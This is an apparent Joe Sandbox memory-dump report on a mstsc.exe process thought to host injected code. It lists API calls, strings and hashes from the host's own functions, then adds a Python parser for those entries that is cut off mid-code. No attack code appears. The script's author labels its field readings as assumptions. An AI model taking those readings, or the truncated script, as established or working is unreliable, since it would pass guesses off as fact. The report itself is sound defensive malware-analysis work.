• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: _wcsnicmp$_wcsicmpwcschr
• String ID:
• API String ID: 4194884975-0
APIs
• GetWindowRect.USER32(00000000,?), ref: 009518F7
• GetWindowLongW.USER32(00000000,000000EC), ref: 00951901
• timeGetTime.WINMM ref: 00951936
• timeSetEvent.WINMM(00000021,00000000,00951976,00000000,00000101), ref: 0095194E
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Windowtime$EventLongRectTime
• String ID:
• API String ID: 3825400517-0
APIs
• memset.MSVCRT ref: 0095B20A
• VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0095B23A
• VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0095B242
• VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0095B24F
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ConditionMask$InfoVerifyVersionmemset
• String ID:
• API String ID: 375572348-0
APIs
• memset.MSVCRT ref: 00943A80
• VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,?), ref: 00943AB2
• VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,?), ref: 00943ABA
• VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00943AC7
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ConditionMask$InfoVerifyVersionmemset
• String ID:
• API String ID: 375572348-0
APIs
• CreateCompatibleDC.GDI32(?), ref: 0093B99D
• SelectObject.GDI32(00000000,?), ref: 0093B9AD
• BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0093B9C8
• DeleteDC.GDI32(00000000), ref: 0093B9CF
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: CompatibleCreateDeleteObjectSelect
• String ID:
• API String ID: 3360107340-0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: __aulldvrm
• String ID: $$0
• API String ID: 1302938615-389342756
APIs
• memset.MSVCRT ref: 009351F7
• GetOpenFileNameW.COMDLG32(?,-0002E684,?,?), ref: 0093526B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: FileNameOpenmemset
• String ID: L
• API String ID: 158052956-2909332022
APIs
  • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
  • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
• ShellMessageBoxW.SHLWAPI ref: 009654B4
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Message$ActivityControlEventShellTrace_vsnwprintf
• String ID: %s%s$StringCchPrintf failed!
• API String ID: 2994778881-397920807
                                                                                                                                                                                    • Opcode ID: 60820335bec01a4a09614bf095844e4963ba5c70162a0e85b21ad75f45b220e7
                                                                                                                                                                                    • Instruction ID: 1631499d399c822fa4db7bc1191019574d65c70583657c8bef39bbe71727bdda
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60820335bec01a4a09614bf095844e4963ba5c70162a0e85b21ad75f45b220e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E41F5316053486FD716DE54CC09FAA37AEAB49300F0600D9F645E71B2CAB5CDC09B52
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsZoomed.USER32(?), ref: 0091B987
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryMessageModuleProcTraceZoomed
                                                                                                                                                                                    • String ID: SyncSessionDisplaySettings failed!$put_FullScreen failed!
                                                                                                                                                                                    • API String ID: 3071394470-3388693860
                                                                                                                                                                                    • Opcode ID: 4e701382bbfa76af6576293c59b72fe458328aeaadf1710c75ddcf22c5ec1650
                                                                                                                                                                                    • Instruction ID: 7e207765031ae2adb72fc3bc0a7cf5c5d045d06165f533ed0a576baae4254e6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e701382bbfa76af6576293c59b72fe458328aeaadf1710c75ddcf22c5ec1650
                                                                                                                                                                                    • Instruction Fuzzy Hash: 914191307083485FD76A8F15C858FA637DBAB89308F28016DE5419B9B6CB61DCC2DB11
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • KillTimer.USER32 ref: 009200EB
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000007D0,00000000), ref: 00920138
                                                                                                                                                                                      • Part of subcall function 00920AC3: GetClientRect.USER32(?,00000006,?,?,00000000,00000006,00000000,?), ref: 00920AE1
                                                                                                                                                                                      • Part of subcall function 00920AC3: RedrawWindow.USER32(?,00000006,00000000,00000045), ref: 00920AF9
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SyncSessionDisplaySettings failed, xrefs: 009200B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Timer$AddressClientFreeHandleKillLibraryMessageModuleProcRectRedrawTraceWindow
                                                                                                                                                                                    • String ID: SyncSessionDisplaySettings failed
                                                                                                                                                                                    • API String ID: 2501523316-3120345431
                                                                                                                                                                                    • Opcode ID: 92cf0036232e3906af5beb59e598d31551b4423ae3060f66755ed1bd8dbd5459
                                                                                                                                                                                    • Instruction ID: ff7ed366e69b1cd21d25df0673763b52a156a7fe03475660af4fc1ce344365a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf0036232e3906af5beb59e598d31551b4423ae3060f66755ed1bd8dbd5459
                                                                                                                                                                                    • Instruction Fuzzy Hash: A441F6316083256FEB299F61E894F7A779ABFC4300F04405DF940AA1A7C7B1D8A1EB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,00902DA4,00000017,?,00000004,NULL,0000000A,NULL,0000000A,NULL,0000000A,00000000), ref: 0091DA22
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 5413a7c5da4ebac83e563af951914c6c0f42cbe23aaf4d9e3e2f5449ac0ec17e
                                                                                                                                                                                    • Instruction ID: d0afa9d9268928350e9546ac31f8c64bebcd8fb8c3cc12e2b7f35a1b43ce6c47
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5413a7c5da4ebac83e563af951914c6c0f42cbe23aaf4d9e3e2f5449ac0ec17e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28419F7670320EDADF249F15C845AFA77B9EB84744F14442AED559B240E3709ED2CBD0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00914B1A
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914B24
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to end all remaining sessions, xrefs: 00914BA2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressDestroyErrorFreeHandleLastLibraryMessageModuleProcTraceWindow
                                                                                                                                                                                    • String ID: Failed to end all remaining sessions
                                                                                                                                                                                    • API String ID: 953134514-2746955642
                                                                                                                                                                                    • Opcode ID: d6b202ada2e46dc31799e0663290bbd5fb9cce9646fd675b5611199ba57373e2
                                                                                                                                                                                    • Instruction ID: 69210bcabbf267684c9ec3de324f16bebe14a25099687bb1c0e49a56fd913ea4
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6b202ada2e46dc31799e0663290bbd5fb9cce9646fd675b5611199ba57373e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27310432B9831C2FD735CE189C89FAABA99AB4C314F06055DF9549B1A2C660DCC09B95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,00908C04,0000000E,00000003,00000004,NULL,0000000A,NULL,0000000A,?,00000004,?,00000004,00000000), ref: 0094D915
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 09f94534fa42cfdb9a4577487cdfe791589404b5f794cf57830cf52fee47d649
                                                                                                                                                                                    • Instruction ID: e81a567c4f952356b01312b3670c93f82e887d080f8444bfcf56fc563f7d7308
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09f94534fa42cfdb9a4577487cdfe791589404b5f794cf57830cf52fee47d649
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721D83A601209ABEB24AF54CC45FBB7779EBC5710F144526FE15DB280E6709D81D790
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,00909810,00000031,?,00000004,NULL,0000000A,NULL,0000000A,?,00000004,00000000), ref: 009524B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                                                                                    • Opcode ID: 6d127296a7e5ee2c7dda144b5c4a4e224e816b9f0a26012a2bbc9f6594d16297
                                                                                                                                                                                    • Instruction ID: 78d0a9ef290bb828052ac5641eac618e1f316231f689181570330fccdeb12605
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d127296a7e5ee2c7dda144b5c4a4e224e816b9f0a26012a2bbc9f6594d16297
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2105366003059ADB34DF56CC01AB7776DEB86741F188425EE159B1A0E6709D8AC3D0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32 ref: 00950B20
                                                                                                                                                                                    • IsWindow.USER32(?), ref: 00950B79
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressDialogFreeHandleLibraryMessageModuleProcTraceWindow
• String ID: C
• API String ID: 4127607370-1037565863
• Opcode ID: 055ef65ec6dd27aa27abeddacbad848fccf83a218454390554c7722ceee4ff71
• Instruction ID: e646411cba5220c2513d3ad0d9c97cbc414de38a3612d25627349a3500d625d0
• Opcode Fuzzy Hash: 055ef65ec6dd27aa27abeddacbad848fccf83a218454390554c7722ceee4ff71
• Instruction Fuzzy Hash: 8221C731214349AFDF28DF1AD499B763795AB8931AF104059FD019B1B1C635CD84EF15
APIs
• LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?,00956ADC,?,?,?,?,?,00000000,00000000), ref: 00957924
• CertDuplicateCertificateContext.CRYPT32(?,?,00000000,?,?,?,?,00956ADC,?,?,?,?,?,00000000,00000000,?), ref: 0095798B
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressAllocCertCertificateContextDuplicateFreeHandleLibraryLocalMessageModuleProcTrace
• String ID: pCertArray
• API String ID: 2178560606-662488200
• Opcode ID: 72cad34bbe07b938de790f968f64d3c8b7f8786a35b2a6346f8368062ddb0d3d
• Instruction ID: 9c1a609e195645c7efe562b4341fda35cdfc85211cdfa36b9f2e6ce5f4c76cb0
• Opcode Fuzzy Hash: 72cad34bbe07b938de790f968f64d3c8b7f8786a35b2a6346f8368062ddb0d3d
• Instruction Fuzzy Hash: 2321D2B6608304AFC724CF99E894E66BBE9EB49350B214199FC44EB361C671DD00DBA0
APIs
• CoCreateInstance.OLE32(009011C4,00000000,00000001,0090A384,?), ref: 0095B289
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Strings
• CoCreateInstance failed!, xrefs: 0095B2AE
• pHomeGroup->IsMember failed!, xrefs: 0095B2F4
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
• String ID: CoCreateInstance failed!$pHomeGroup->IsMember failed!
• API String ID: 3463782917-307709413
• Opcode ID: e9631d74c7cf36d6ab3bcef2b5dca5cb4fa94ae31784037cc75174d78719edc2
• Instruction ID: aad2d7d9fbde01827cf702ec5d08428d993125d445bdf4ada912db6a52fb0e0b
• Opcode Fuzzy Hash: e9631d74c7cf36d6ab3bcef2b5dca5cb4fa94ae31784037cc75174d78719edc2
• Instruction Fuzzy Hash: 672179B1604348AFDB19CF56C849F797BADAB89309F18008CF901AA1A1C7B1DD45EB11
APIs
• TraceMessage.ADVAPI32(80070057,0091396B,0000002B,0090B970,0091396B,?,00000004,NULL,00000005,?,00000005,80070057,00000004,00000000,?,FF000000), ref: 0093BAA2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageTrace
• String ID: NULL$W
• API String ID: 471583391-3636870356
• Opcode ID: 2c82d287af1fd9f67903aeffa126bed33239b4a5a8f04509142f7f296607bb64
• Instruction ID: 858d39771e00c66767a68e14171e7f2e698ad80d8471f8fd7b17f7e45089a1cf
• Opcode Fuzzy Hash: 2c82d287af1fd9f67903aeffa126bed33239b4a5a8f04509142f7f296607bb64
• Instruction Fuzzy Hash: 7711C876600609BBDB25CE499C44FBBBBBDDB84350F108169FE59D7240D7315E058BA0
APIs
• EndDialog.USER32 ref: 0094011B
  • Part of subcall function 009620A0: IsDlgButtonChecked.USER32(?,00003301,?,00935407), ref: 009620BE
  • Part of subcall function 009620A0: IsDlgButtonChecked.USER32(?,000036C6,?,00935407), ref: 009620D4
• EndDialog.USER32 ref: 00940138
Strings
• mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7, xrefs: 00940147
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ButtonCheckedDialog
• String ID: mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7
• API String ID: 2092719057-504666242
• Opcode ID: 7dce49ee8ce0e47374a7a4d6407df751cc24dd245e4dec929c556c7d1c024cf7
• Instruction ID: 2a393007a62a2df92b1ccdffb0eb604d1819e025a618adba95d9234d035d5e24
• Opcode Fuzzy Hash: 7dce49ee8ce0e47374a7a4d6407df751cc24dd245e4dec929c556c7d1c024cf7
• Instruction Fuzzy Hash: 5A11B232208119FBCB299F54DC4AEBA7B69EF89750F048115FF18AA1A1C771DD20E790
APIs
• memset.MSVCRT ref: 00939323
• SendMessageW.USER32(?,00000440,0000139A,00000020), ref: 009393AE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageSendmemset
• String ID:
• API String ID: 568519121-3916222277
• Opcode ID: 02d1f2cea49fe3a9701949f36639f7e3bc6435f2f8dbe1ccf3c71dbb2c5b99fd
• Instruction ID: 74a79436671c259b55470890816dc1376fa5dae7757c2cef30d8b792c5cdf15d
• Opcode Fuzzy Hash: 02d1f2cea49fe3a9701949f36639f7e3bc6435f2f8dbe1ccf3c71dbb2c5b99fd
• Instruction Fuzzy Hash: BB119A7590031CAFDB10DF65DC49BDBB3F9EB88310F1086A9E94993251DA74AE448F44
APIs
• TraceMessage.ADVAPI32(?,00000000,0000002B,00908AB4,00000028,00000000,00000004,NULL,0000000A,0094BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 0091D8F1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageTrace
• String ID: <NULL>$NULL
• API String ID: 471583391-888386124
• Opcode ID: 75d187b2b219f56561e03d6ddfe38ced41f188a006db7cfed7c89477756842ff
• Instruction ID: 450ba51cf3175771d2a75db0f1e6fdb6045040e36cdbd833c99e12455cea1127
• Opcode Fuzzy Hash: 75d187b2b219f56561e03d6ddfe38ced41f188a006db7cfed7c89477756842ff
• Instruction Fuzzy Hash: B311E172A01218ABEB249F54DC46FFB736CDB45710F1444AAFE159B180E3B16E91C3A0
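The entries in this section all come from the same dump (process 10, the mstsc.exe image rebased at 0x900000, "based on PE: true"), and the visible strings (pHomeGroup->IsMember, put_FullScreen, mshelp:// help links, ETW tracing through TraceMessage) are consistent with the host's own code rather than the injected payload. Reading thousands of these by eye is impractical; the usual move is to parse them into records and ask structural questions: which functions call into a module of interest, which helper routine is shared by many callers (00911040 recurs in most entries above), and what the RVA of a call site is so it can be compared against the clean mstsc.exe on disk to separate original code from injected code. The script below is an added example and not part of the Joe Sandbox report or its tooling. Its sample input is constructed from the entries above, abbreviated to three records. The interpretation of the first two fields of the .sdmp file name as process id and snapshot number is an assumption, supported only by the matching Snapshot File name hcaresult_10_2_900000_mstsc; the module and API watchlist is illustrative, not a detection rule.

```python
import re
from collections import defaultdict

# Constructed sample: three function-analysis entries in the layout of this
# report's disassembly section (process 10, mstsc.exe image rebased at 0x900000).
# The API, string and source lines are copied from the entries above.
SAMPLE = """\
APIs
• LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?,00956ADC,?,?,?,?,?,00000000,00000000), ref: 00957924
• CertDuplicateCertificateContext.CRYPT32(?,?,00000000,?,?,?,?,00956ADC,?,?,?,?,?,00000000,00000000,?), ref: 0095798B
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
APIs
• CoCreateInstance.OLE32(009011C4,00000000,00000001,0090A384,?), ref: 0095B289
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
Strings
• CoCreateInstance failed!, xrefs: 0095B2AE
• pHomeGroup->IsMember failed!, xrefs: 0095B2F4
APIs
• EndDialog.USER32 ref: 0094011B
  • Part of subcall function 009620A0: IsDlgButtonChecked.USER32(?,00003301,?,00935407), ref: 009620BE
• EndDialog.USER32 ref: 00940138
Strings
• mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7, xrefs: 00940147
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<helper>[0-9A-F]{8}): )?"
                    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
# Assumption: the first two dotted fields of the .sdmp name are process id and snapshot number.
SOURCE_RE = re.compile(r"^Source File: (?P<pid>[0-9A-F]{8})\.(?P<snap>[0-9A-F]{8})\.\S+\.sdmp, "
                       r"Offset: (?P<base>[0-9A-F]{8}), based on PE: (?P<pe>true|false)$")

def parse_entries(text):
    """One record per function; an 'APIs' header starts a new record."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()  # drop indentation and bullet glyphs
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                cur = {"direct": [], "helpers": defaultdict(list), "strings": [], "source": None}
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            call = {"api": m["api"], "module": m["module"].upper(), "ref": int(m["ref"], 16),
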